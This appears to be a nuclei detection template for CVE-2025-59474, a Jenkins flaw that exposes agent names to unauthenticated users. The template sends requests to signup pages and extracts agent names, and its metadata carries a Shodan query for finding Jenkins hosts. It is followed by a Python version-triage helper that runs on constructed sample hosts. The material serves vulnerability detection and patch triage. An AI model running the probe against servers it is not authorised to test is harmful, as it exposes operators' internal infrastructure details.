id: CVE-2025-59474

info:
  name: Jenkins Sidepanel - Unauthorized Agent/Queue Exposure
  author: ivaldivieso
  severity: medium
  description: |
    Jenkins 2.527 and earlier, LTS 2.516.2 and earlier does not perform a permission check in the sidepanel of a page intentionally accessible to users lacking Overall/Read permission, allowing attackers without Overall/Read permission to list agent names through its sidepanel executors widget.
  impact: Attackers can list agent names without required permissions, potentially exposing sensitive infrastructure details.
  remediation: Update to a version later than 2.527 or LTS later than 2.516.2.
  reference:
    - https://www.jenkins.io/security/advisory/2025-09-17/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-59474
    - https://medium.com/@Th3hound/exposing-jenkins-agents-without-auth-research-on-cve-2025-59474-ff95a2e7d22a
  metadata:
    verified: true
    max-request: 2
    shodan-query: product:"jenkins"
  tags: cve,cve2025,jenkins,sidepanel,unauth,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/securityRealm/signup"
      - "{{BaseURL}}/jenkins/securityRealm/signup"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Build Executor Status'
          - 'Estado del ejecutor'
          - 'id="executors"'
        condition: or

      - type: regex
        part: body
        regex:
          - 'href="[^"]*/computer/[^"]*/?"'

    extractors:
      - type: regex
        name: agents
        part: body
        group: 1
        regex:
          - 'href="[^"]*/computer/([^"/]+)/?"'
        internal: true

      - type: dsl
        dsl:
          - 'urldecode(agents)'
# digest: 4a0a0047304502206c0c2b8d5f43427d574175ba0732aa2d631e691aff951a69fcbe015639534ef3022100865d934dc1e61af850f5bcab8a8b4d625ba71c87cf5ec28610a66bbfee8435be:922c64590222798bb761d5b6d8e72950
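The template above confirms exposure from the response body. A complementary defender-side check is to triage an inventory of Jenkins instances by version against the affected range the remediation line states (weekly 2.527 and earlier, LTS 2.516.2 and earlier). The following helper is an added example, not part of the nuclei template or of the Jenkins project; it assumes the usual Jenkins numbering (weekly releases carry two components such as 2.527, LTS releases three such as 2.516.2) and reads the version from the `X-Jenkins` response header, which Jenkins sends on its pages. The sample headers are constructed.

```python
"""Version triage for CVE-2025-59474 (added example, not the template's own logic).

Assumptions (not from the template): weekly Jenkins versions have two dotted
components (2.527) and LTS versions three (2.516.2); the X-Jenkins response
header carries the running version when the server has not hidden it.
"""
from typing import Dict, Optional, Tuple

# Last affected versions, taken from the template's remediation text.
LAST_AFFECTED_WEEKLY: Tuple[int, ...] = (2, 527)
LAST_AFFECTED_LTS: Tuple[int, ...] = (2, 516, 2)


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.516.2' into (2, 516, 2); reject anything that is not 2 or 3 dotted integers."""
    parts = version.strip().split(".")
    if len(parts) not in (2, 3) or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised Jenkins version string: {version!r}")
    return tuple(int(p) for p in parts)


def is_affected(version: str) -> bool:
    """True when the version is in the range the advisory lists as affected.

    Weekly and LTS lines are compared against their own threshold, since a
    weekly 2.520 is newer than LTS 2.516.2 but still older than the weekly fix.
    """
    v = parse_version(version)
    if len(v) == 3:  # LTS line
        return v <= LAST_AFFECTED_LTS
    return v <= LAST_AFFECTED_WEEKLY  # weekly line


def version_from_headers(headers: Dict[str, str]) -> Optional[str]:
    """Return the X-Jenkins header value (case-insensitive lookup), or None if absent."""
    for name, value in headers.items():
        if name.lower() == "x-jenkins":
            return value.strip()
    return None


def triage(headers: Dict[str, str]) -> str:
    """Classify one host as 'affected', 'not affected' or 'unknown'.

    'unknown' covers a hidden header or an unparsable value; those hosts still
    need the body-based check the template performs, since absence of the
    header is not evidence of a patched server.
    """
    version = version_from_headers(headers)
    if version is None:
        return "unknown"
    try:
        return "affected" if is_affected(version) else "not affected"
    except ValueError:
        return "unknown"


if __name__ == "__main__":
    # Constructed sample headers for three hypothetical hosts.
    inventory = {
        "ci-a.example.test": {"X-Jenkins": "2.516.2", "Server": "Jetty"},
        "ci-b.example.test": {"x-jenkins": "2.528"},
        "ci-c.example.test": {"Server": "Jetty"},  # header hidden
    }
    for host, hdrs in inventory.items():
        print(f"{host}: {triage(hdrs)}")
```

A version that compares as "not affected" only rules out this issue for that release line; hosts reporting "unknown" should be confirmed with the template's body match rather than assumed safe.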